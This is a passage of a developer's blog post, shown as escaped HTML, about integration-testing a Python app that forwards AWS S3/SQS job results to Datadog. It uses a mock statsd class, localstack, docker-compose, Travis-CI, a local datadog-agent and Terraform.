&lt;span class="n">s3_client&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">session&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">client&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;s3&amp;#39;&lt;/span>&lt;span class="p">))&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">run&lt;/span>&lt;span class="p">()&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>In addition, it also requires a preconfigured AWS profile in &lt;code>~/.aws/credentials&lt;/code> which is necessary for &lt;strong>boto3&lt;/strong> to authenticate to AWS:&lt;/p>
&lt;pre>&lt;code class="language-console" data-lang="console">[profile-name]
aws_access_key_id = XXXXXXXXXXXXXXX
aws_secret_access_key = XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
region = eu-central-1
&lt;/code>&lt;/pre>&lt;p>But before running it, let&amp;rsquo;s set up some integration tests!&lt;/p>
&lt;h3 id="-mocking-datadog-statsd-client-">~ Mocking Datadog statsd client ~&lt;/h3>
&lt;p>In truth, the application does not interact directly with the Datadog API, but rather it uses &lt;strong>statsd&lt;/strong> from the &lt;code>datadog&lt;/code> python package, which interacts with the local &lt;code>datadog-agent&lt;/code>, which in turn forwards metrics and events to the Datadog API.&lt;/p>
&lt;p>To test this flow that relies on &lt;code>statsd&lt;/code>, I created a class called &lt;strong>DataDogStatsDHelper&lt;/strong>. This class has 2 functions (&lt;strong>gauge/event&lt;/strong>) with identical signatures to the real functions from the official &lt;code>datadog-statsd&lt;/code> package. However, the mock functions do not send anything to the &lt;code>datadog-agent&lt;/code>. Instead, they accumulate the values they were passed in local class variables:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="k">class&lt;/span> &lt;span class="nc">DataDogStatsDHelper&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="n">event_title&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="bp">None&lt;/span>
&lt;span class="n">event_text&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="bp">None&lt;/span>
&lt;span class="n">event_alert_type&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="bp">None&lt;/span>
&lt;span class="n">event_tags&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="bp">None&lt;/span>
&lt;span class="n">event_counter&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">0&lt;/span>
&lt;span class="n">gauge_metric_name&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="bp">None&lt;/span>
&lt;span class="n">gauge_metric_value&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="bp">None&lt;/span>
&lt;span class="n">gauge_tags&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="bp">None&lt;/span>
&lt;span class="n">gauge_counter&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">0&lt;/span>
&lt;span class="k">def&lt;/span> &lt;span class="nf">event&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="bp">self&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">title&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">text&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">alert_type&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="bp">None&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">aggregation_key&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="bp">None&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">source_type_name&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="bp">None&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="n">date_happened&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="bp">None&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">priority&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="bp">None&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">tags&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="bp">None&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">hostname&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="bp">None&lt;/span>&lt;span class="p">):&lt;/span>
&lt;span class="o">...&lt;/span>
&lt;span class="k">def&lt;/span> &lt;span class="nf">gauge&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="bp">self&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">metric&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">value&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">tags&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="bp">None&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">sample_rate&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="bp">None&lt;/span>&lt;span class="p">):&lt;/span>
&lt;span class="o">...&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>When the MetricSubmitter class is tested, this mock class is injected instead of the real &lt;strong>statsd&lt;/strong> class, which enables assertions to be made and compare expectations with reality.&lt;/p>
&lt;h3 id="-aws-resources-in-localstack-">~ AWS resources in localstack ~&lt;/h3>
&lt;p>To test how the python app integrates with S3 and SQS, I decided to use &lt;strong>loalstack&lt;/strong>, running in a Docker container. To make it simple and repeatable, I created a &lt;code>docker-compose.yaml&lt;/code> file that allows the configuration parameters to be defined in YAML:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-yml" data-lang="yml">&lt;span class="k">version&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="s1">&amp;#39;3.2&amp;#39;&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>&lt;span class="k">services&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">localstack&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">image&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>localstack/localstack&lt;span class="p">:&lt;/span>latest&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">container_name&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>localstack&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">ports&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>- &lt;span class="s1">&amp;#39;4563-4599:4563-4599&amp;#39;&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>- &lt;span class="s1">&amp;#39;8080:8080&amp;#39;&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">environment&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>- SERVICES=s3&lt;span class="p">,&lt;/span>sqs&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>- AWS_ACCESS_KEY_ID=foo&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>- AWS_SECRET_ACCESS_KEY=bar&lt;span class="w">
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>The resulting fake AWS resources are accessible via different ports on localhost. In this case, S3 runs on port &lt;strong>4572&lt;/strong> and SQS on port &lt;strong>4576&lt;/strong>. Refer to the
&lt;a href="https://github.com/localstack/localstack#overview" target="_blank" rel="noopener">docs&lt;/a> on GitHub for more details on ports used by other AWS services in localstack.&lt;/p>
&lt;p>It is important to note that when localstack starts up, it is completely empty. Thus, before the integration tests can run, it is necessary to provision the S3 bucket and SQS queue in localstack, just as one would normally do it when using real AWS resources.&lt;/p>
&lt;p>For this purpose, it&amp;rsquo;s possible to write a simple bash script that can be called from the localstack container as part of an automatic init script:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-shell" data-lang="shell">aws --endpoint-url&lt;span class="o">=&lt;/span>http://localhost:4572 s3api create-bucket --bucket &lt;span class="s2">&amp;#34;bucket-name&amp;#34;&lt;/span> --region &lt;span class="s2">&amp;#34;eu-central-1&amp;#34;&lt;/span>
aws --endpoint-url&lt;span class="o">=&lt;/span>http://localhost:4576 sqs create-queue --queue-name &lt;span class="s2">&amp;#34;queue-name&amp;#34;&lt;/span> --region &lt;span class="s2">&amp;#34;eu-central-1&amp;#34;&lt;/span> --attributes &lt;span class="s2">&amp;#34;MaximumMessageSize=4096,MessageRetentionPeriod=345600,VisibilityTimeout=30&amp;#34;&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>However, for the sake of making the integration-tests self-contained, I opted to integrate this into the tests as part of a class setup phase that runs before any tests and sets up the required S3 bucket and SQS queue:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="nd">@classmethod&lt;/span>
&lt;span class="k">def&lt;/span> &lt;span class="nf">setUpClass&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="bp">cls&lt;/span>&lt;span class="p">):&lt;/span>
&lt;span class="bp">cls&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">ls&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">LocalStackHelper&lt;/span>&lt;span class="p">()&lt;/span>
&lt;span class="bp">cls&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">ls&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">get_s3_client&lt;/span>&lt;span class="p">()&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">create_bucket&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">Bucket&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="bp">cls&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">s3_bucket_name&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="bp">cls&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">ls&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">get_sqs_client&lt;/span>&lt;span class="p">()&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">create_queue&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">QueueName&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="bp">cls&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">sqs_queue_name&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;h3 id="-creating-integration-tests-">~ Creating integration tests ~&lt;/h3>
&lt;p>As a next step I created the integration
&lt;a href="https://github.com/florianakos/python-testing/blob/master/app/test_submitter.py" target="_blank" rel="noopener">tests&lt;/a> which use the fake AWS resources in localstack, as well as the mock &lt;strong>statsd&lt;/strong> class for DataDog. I used two popular python packages to create these:&lt;/p>
&lt;ul>
&lt;li>&lt;strong>unittest&lt;/strong> which is a built-in package&lt;/li>
&lt;li>&lt;strong>pytest&lt;/strong> which is a 3rd party package&lt;/li>
&lt;/ul>
&lt;p>Actually, the test cases only use &lt;strong>unittest&lt;/strong>, while &lt;strong>pytest&lt;/strong> is used for the simple collection and execution of those tests. To get started with the &lt;strong>unittest&lt;/strong> framework, I created a python class and implemented the test cases within this class:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="kn">import&lt;/span> &lt;span class="nn">unittest&lt;/span>
&lt;span class="kn">from&lt;/span> &lt;span class="nn">app.utils.datadog_fake_statsd&lt;/span> &lt;span class="kn">import&lt;/span> &lt;span class="n">DataDogStatsDHelper&lt;/span>
&lt;span class="kn">from&lt;/span> &lt;span class="nn">app.utils.localstack_helper&lt;/span> &lt;span class="kn">import&lt;/span> &lt;span class="n">LocalStackHelper&lt;/span>
&lt;span class="kn">from&lt;/span> &lt;span class="nn">app.submitter&lt;/span> &lt;span class="kn">import&lt;/span> &lt;span class="n">MetricSubmitter&lt;/span>
&lt;span class="k">class&lt;/span> &lt;span class="nc">ProjectIntegrationTesting&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">unittest&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">TestCase&lt;/span>&lt;span class="p">):&lt;/span>
&lt;span class="nd">@classmethod&lt;/span>
&lt;span class="k">def&lt;/span> &lt;span class="nf">setUpClass&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="bp">cls&lt;/span>&lt;span class="p">):&lt;/span>
&lt;span class="o">...&lt;/span>
&lt;span class="k">def&lt;/span> &lt;span class="nf">setUp&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="bp">self&lt;/span>&lt;span class="p">):&lt;/span>
&lt;span class="o">...&lt;/span>
&lt;span class="k">def&lt;/span> &lt;span class="nf">test_ddg_submitter_valid_payload&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="bp">self&lt;/span>&lt;span class="p">):&lt;/span>
&lt;span class="o">...&lt;/span>
&lt;span class="k">def&lt;/span> &lt;span class="nf">test_ddg_submitter_invalid_payload&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="bp">self&lt;/span>&lt;span class="p">):&lt;/span>
&lt;span class="o">...&lt;/span>
&lt;span class="k">def&lt;/span> &lt;span class="nf">test_aws_handler_invalid_s3key&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="bp">self&lt;/span>&lt;span class="p">):&lt;/span>
&lt;span class="o">...&lt;/span>
&lt;span class="k">def&lt;/span> &lt;span class="nf">test_aws_handler_valid_s3key&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="bp">self&lt;/span>&lt;span class="p">):&lt;/span>
&lt;span class="o">...&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>In the &lt;strong>setUpClass&lt;/strong> method, a few things are taken care of before tests can be executed:&lt;/p>
&lt;ul>
&lt;li>define class variables for the bucket &amp;amp; the queue&lt;/li>
&lt;li>create SQS &amp;amp; S3 clients using localstack endpoint url&lt;/li>
&lt;li>provision needed resources (Queue/Bucket) in localstack&lt;/li>
&lt;/ul>
&lt;p>To test the interaction with DataDog via the statsd client, the submitter app is executed, which stores some values in the mock &lt;strong>statsd&lt;/strong> class&amp;rsquo;s internal variables, which are then used in assertions to compare values with expectations.&lt;/p>
&lt;p>The other tests inspect the behaviour of the &lt;strong>CloudResourceHandler&lt;/strong> class. For example, one of the assertions tests whether the &lt;code>.has_available_messages()&lt;/code> function returns false when there are no more messages in the queue.&lt;/p>
&lt;p>A nice feature of &lt;strong>unittest&lt;/strong> is that it&amp;rsquo;s easy to define tasks that need to be executed before each test, to ensure a clean slate for each test. For example, the code in the &lt;strong>setUp&lt;/strong> method ensures two things:&lt;/p>
&lt;ul>
&lt;li>the fake SQS queue is emptied before each test&lt;/li>
&lt;li>class variables of the mock DataDog class are reset before each test&lt;/li>
&lt;/ul>
&lt;p>Theoretically, it would be possible to run the test by running &lt;code>pytest -s -v&lt;/code> in the python project&amp;rsquo;s root directory, however the tests rely on localstack, so they would fail&amp;hellip;&lt;/p>
&lt;h3 id="-travis-ci-integration-">~ Travis-CI integration ~&lt;/h3>
&lt;p>So now that the integration tests are created, I thought it would be really nice to have them automatically run in a CI service, whenever someone pushes changes to the Git repo. To this end, I created a free account on &lt;code>travis-ci.org&lt;/code> and integrated it with my github rep by creating a &lt;strong>.travis.yaml&lt;/strong> file with the below initial content:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-yaml" data-lang="yaml">&lt;span class="k">os&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>linux&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>&lt;span class="k">language&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>python&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>&lt;span class="k">python&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>- &lt;span class="s2">&amp;#34;3.8&amp;#34;&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>&lt;span class="k">services&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>- docker&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>&lt;span class="k">script&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>- {...}&lt;span class="w">
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>However, I still needed a way to run &lt;code>localstack&lt;/code> and then execute the integration tests within the CI environment. Luckily I found &lt;strong>docker-compose&lt;/strong> to be a perfect fit for this purpose. I had already created a yaml file to describe how to run &lt;code>localstack&lt;/code>, so now I could just simply add an extra container that would run my tests. Here is how I created a docker image to run the tests via docker-compose:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-dockerfile" data-lang="dockerfile">&lt;span class="k">FROM&lt;/span>&lt;span class="s"> python:3.8-alpine&lt;/span>&lt;span class="err">
&lt;/span>&lt;span class="err">&lt;/span>&lt;span class="k">WORKDIR&lt;/span>&lt;span class="s"> /app&lt;/span>&lt;span class="err">
&lt;/span>&lt;span class="err">&lt;/span>&lt;span class="k">COPY&lt;/span> ./requirements-test.txt ./&lt;span class="err">
&lt;/span>&lt;span class="err">&lt;/span>&lt;span class="k">RUN&lt;/span> apk add --no-cache --virtual .pynacl_deps build-base gcc make python3 python3-dev libffi-dev &lt;span class="se">\
&lt;/span>&lt;span class="se">&lt;/span> &lt;span class="o">&amp;amp;&amp;amp;&lt;/span> pip3 install --upgrade setuptools pip &lt;span class="se">\
&lt;/span>&lt;span class="se">&lt;/span> &lt;span class="o">&amp;amp;&amp;amp;&lt;/span> pip3 install --no-cache-dir -r requirements-test.txt &lt;span class="se">\
&lt;/span>&lt;span class="se">&lt;/span> &lt;span class="o">&amp;amp;&amp;amp;&lt;/span> rm requirements-test.txt&lt;span class="err">
&lt;/span>&lt;span class="err">&lt;/span>&lt;span class="k">COPY&lt;/span> ./utils/*.py ./utils/&lt;span class="err">
&lt;/span>&lt;span class="err">&lt;/span>&lt;span class="k">COPY&lt;/span> ./*.py ./&lt;span class="err">
&lt;/span>&lt;span class="err">&lt;/span>&lt;span class="k">ENV&lt;/span> LOCALSTACK_HOST localstack&lt;span class="err">
&lt;/span>&lt;span class="err">&lt;/span>&lt;span class="k">ENTRYPOINT&lt;/span> &lt;span class="p">[&lt;/span>&lt;span class="s2">&amp;#34;pytest&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s2">&amp;#34;-s&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s2">&amp;#34;-v&amp;#34;&lt;/span>&lt;span class="p">]&lt;/span>&lt;span class="err">
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>It installs the necessary dependencies to an alpine based python 3.8 image; adds the necessary source code, and finally executes &lt;strong>pytest&lt;/strong> to collect &amp;amp; run the tests. Here are the updates I had to make to the &lt;strong>docker-compose.yaml&lt;/strong> file:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-yaml" data-lang="yaml">&lt;span class="k">version&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="s1">&amp;#39;3.2&amp;#39;&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>&lt;span class="k">services&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">localstack&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>{...}&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">integration-tests&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">container_name&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>cloud-job-it&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">build&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">context&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>.&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">dockerfile&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>Dockerfile-tests&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">depends_on&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>- &lt;span class="s2">&amp;#34;localstack&amp;#34;&lt;/span>&lt;span class="w">
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Docker Compose auto-magically creates a shared network to enable connectivity between the defined services, which can call one-another by name. So when the tests are running in the &lt;strong>cloud-job-it&lt;/strong> container, they can use the hostname &lt;strong>localstack&lt;/strong> to create the &lt;strong>boto3&lt;/strong> session via the endpoint url to reach the fake AWS resources.&lt;/p>
&lt;p>For easier to creation of AWS clients via localstack, I used a package called
&lt;a href="https://github.com/localstack/localstack-python-client" target="_blank" rel="noopener">localstack-python-client&lt;/a>, so I don&amp;rsquo;t have to deal with port numbers and low level details. However, this client by default tries to use &lt;strong>localhost&lt;/strong> as the hostname, which wouldn&amp;rsquo;t work in my setup using docker-compose. After digging through the source-code of this python package, I found a way to change this by setting an environment variable named &lt;strong>LOCALSTACK_HOST&lt;/strong>.&lt;/p>
&lt;p>As a final step, I just had to add two lines to complete to the &lt;strong>.travis.yaml&lt;/strong> file:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-yaml" data-lang="yaml">&lt;span class="k">script&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>- docker-compose&lt;span class="w"> &lt;/span>up&lt;span class="w"> &lt;/span>--build&lt;span class="w"> &lt;/span>--abort-on-container-exit&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>- docker-compose&lt;span class="w"> &lt;/span>down&lt;span class="w"> &lt;/span>-v&lt;span class="w"> &lt;/span>--rmi&lt;span class="w"> &lt;/span>all&lt;span class="w"> &lt;/span>--remove-orphans&lt;span class="w">
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Thanks to the &lt;code>--abort-on-container-exit&lt;/code> flag, docker-compose will return the same exit code which is returned from the container that first exits, which first this use-case perfectly, as the &lt;strong>cloud-job-it&lt;/strong> container only runs until the tests finish. This way the whole setup will gracefully shut down, while preserving the exit code from the container, allowing the CI system to generate an alert if it&amp;rsquo;s not 0 (meaning some test failed).&lt;/p>
&lt;h3 id="-running-the-datadog-agent-locally-">~ Running the datadog-agent locally ~&lt;/h3>
&lt;p>&lt;strong>Note&lt;/strong>: while Datadog is a paid service, it&amp;rsquo;s possible to create a trial account that&amp;rsquo;s free for 2 weeks, without the need to enter credit card details. This is pretty amazing!&lt;/p>
&lt;p>Now that the integration tests are automated and passing, I wanted to run the &lt;code>datadog-agent&lt;/code> locally, so that I can test the python application with some real data that was to he submitted to Datadog via the agent. Here is an
&lt;a href="https://docs.datadoghq.com/getting_started/agent/?tab=datadogeusite" target="_blank" rel="noopener">article&lt;/a> that was particularly useful to me, with instructions on how the agent should be set up.&lt;/p>
&lt;p>While the option of running it in docker-compose was initially appealing, I eventually decided to just start it manually as a long-lived detached container. Here is how I went about doing that:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-shell" data-lang="shell">&lt;span class="nv">DOCKER_CONTENT_TRUST&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="m">1&lt;/span> docker run -d &lt;span class="se">\
&lt;/span>&lt;span class="se">&lt;/span> --name dd-agent &lt;span class="se">\
&lt;/span>&lt;span class="se">&lt;/span> -v /var/run/docker.sock:/var/run/docker.sock:ro &lt;span class="se">\
&lt;/span>&lt;span class="se">&lt;/span> -v /proc/:/host/proc/:ro &lt;span class="se">\
&lt;/span>&lt;span class="se">&lt;/span> -v /sys/fs/cgroup/:/host/sys/fs/cgroup:ro &lt;span class="se">\
&lt;/span>&lt;span class="se">&lt;/span> -e &lt;span class="nv">DD_API_KEY&lt;/span>&lt;span class="o">=&lt;/span>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX &lt;span class="se">\
&lt;/span>&lt;span class="se">&lt;/span> -e &lt;span class="nv">DD_SITE&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s2">&amp;#34;datadoghq.eu&amp;#34;&lt;/span> &lt;span class="se">\
&lt;/span>&lt;span class="se">&lt;/span> -e &lt;span class="nv">DD_DOGSTATSD_NON_LOCAL_TRAFFIC&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="nb">true&lt;/span> &lt;span class="se">\
&lt;/span>&lt;span class="se">&lt;/span> -p 8125:8125/udp &lt;span class="se">\
&lt;/span>&lt;span class="se">&lt;/span> datadog/agent:7
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Most notable of these lines is the &lt;strong>DD_API_KEY&lt;/strong> environment variable which ensures that whatever data I send to the agent is associated with my own account. In addition, since I am closest to the EU region, I had to specify the endpoint via the &lt;strong>DD_SITE&lt;/strong> variable. Also, because I want the agent to accept metrics from the python app, I need to turn on a feature via the environment variable &lt;strong>DD_DOGSTATSD_NON_LOCAL_TRAFFIC&lt;/strong>, as well as expose port 8125 from the docker container to the host machine:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash"> ▶ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
477cb2ea74b2 datadog/agent &lt;span class="s2">&amp;#34;/init&amp;#34;&lt;/span> &lt;span class="m">3&lt;/span> days ago Up &lt;span class="m">3&lt;/span> days &lt;span class="o">(&lt;/span>healthy&lt;span class="o">)&lt;/span> 0.0.0.0:8125-&amp;gt;8125/udp, 8126/tcp dd-agent
&lt;/code>&lt;/pre>&lt;/div>&lt;p>All seems to be well!&lt;/p>
&lt;h3 id="-deploying-real-aws-resources-">~ Deploying real AWS resources ~&lt;/h3>
&lt;p>Here I briefly discuss how I deployed some real resources in AWS to see my application running live. In a nutshell, I set the infra up as code in Terraform, which greatly simplified the whole process. All the necessary files are collected in a
&lt;a href="https://github.com/florianakos/python-testing/tree/master/terraform" target="_blank" rel="noopener">directory&lt;/a> of my repository:&lt;/p>
&lt;ul>
&lt;li>&lt;code>variables.tf&lt;/code> defines some variables used in multiple places&lt;/li>
&lt;li>&lt;code>init.tf&lt;/code> initialisation of the AWS provider and definition of AWS resources&lt;/li>
&lt;li>&lt;code>outputs.tf&lt;/code> defines some values that are reported when deployment finishes&lt;/li>
&lt;/ul>
&lt;p>The first and last files are not very interesting. Most of the interesting stuff happens in the &lt;strong>init.tf&lt;/strong>, which defines the necessary resources and permissions. One extra resource not mentioned before, is an AWS Lambda function, which gets executed every minute and is used to upload a JSON file to the S3 bucket. This acts as a random source of data, so that the python app has some work to do without manual intervention.&lt;/p>
&lt;h3 id="-live-testing-">~ Live testing ~&lt;/h3>
&lt;p>Now that all parts seem to be ready, it&amp;rsquo;s time to run the main python app using the real S3 bucket and SQS queue, as well as the local datadog-agent. The console output provides some hints whether it&amp;rsquo;s able to pump the metrics from AWS to a DataDog:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">▶ python3 submitter.py
Initializing new Cloud Resource Handler with SQS URL - https://.../cloud-job-results-queue
Processing available messages in SQS queue:
- sending data to DataDog via statsd/datadog-agent.
- removing message from SQS &lt;span class="o">(&lt;/span>AQEBO37smPPHg6OIqbh3HMu3g...&lt;span class="o">)&lt;/span>
- ...
- sending data to DataDog via statsd/datadog-agent.
- removing message from SQS &lt;span class="o">(&lt;/span>AQEBV0/JzMVEP6k5kBmx2kvGn...&lt;span class="o">)&lt;/span>
No more messages visible in the queue, shutting down ...
Process finished with &lt;span class="nb">exit&lt;/span> code &lt;span class="m">0&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Next, I checked my DataDog account to see whether the metric data arrived. For this I created a custom
&lt;a href="https://app.datadoghq.eu/notebook/list" target="_blank" rel="noopener">Notebook&lt;/a> with graphs to display them:&lt;/p>
&lt;p>&lt;img src="img/datadog-metrics.png" alt="DataDog Metrics">&lt;/p>
&lt;p>All seems to be well! The deployed AWS Lambda function has already run a few times, providing input data for the python app, which were successfully processed and forwarded to Datadog. As seen on the &lt;code>Notebook&lt;/code> above, it is really easy to display metric data over time about any recurring workload, which can provide pretty useful insights into those jobs.&lt;/p>
&lt;p>Furthermore, since DataDog also submission of
&lt;a href="https://docs.datadoghq.com/events/" target="_blank" rel="noopener">events&lt;/a> it becomes possible to design dashboards and create alerts which trigger based on mor complex criteria, such as the presence or lack of events over certain periods of time. One such example can be seen below:&lt;/p>
&lt;p>&lt;img src="img/ok-vs-fail.png" alt="DataDog Dashboard OK">&lt;/p>
&lt;p>This is a so-called
&lt;a href="https://docs.datadoghq.com/dashboards/screenboards/" target="_blank" rel="noopener">screen-board&lt;/a> which I created to display the status of a Monitor that I set up previously. This Monitor tracks incoming events with the tag &lt;strong>cloud_job_metric&lt;/strong> and generates an alert, if there is not at least one such event of type &lt;strong>success&lt;/strong> in the last 30 minutes. The screen-board can be exported via a public URL if needed, or just simply displayed on a big screen somewhere in the office.&lt;/p>
&lt;h2 id="conclusions">Conclusions&lt;/h2>
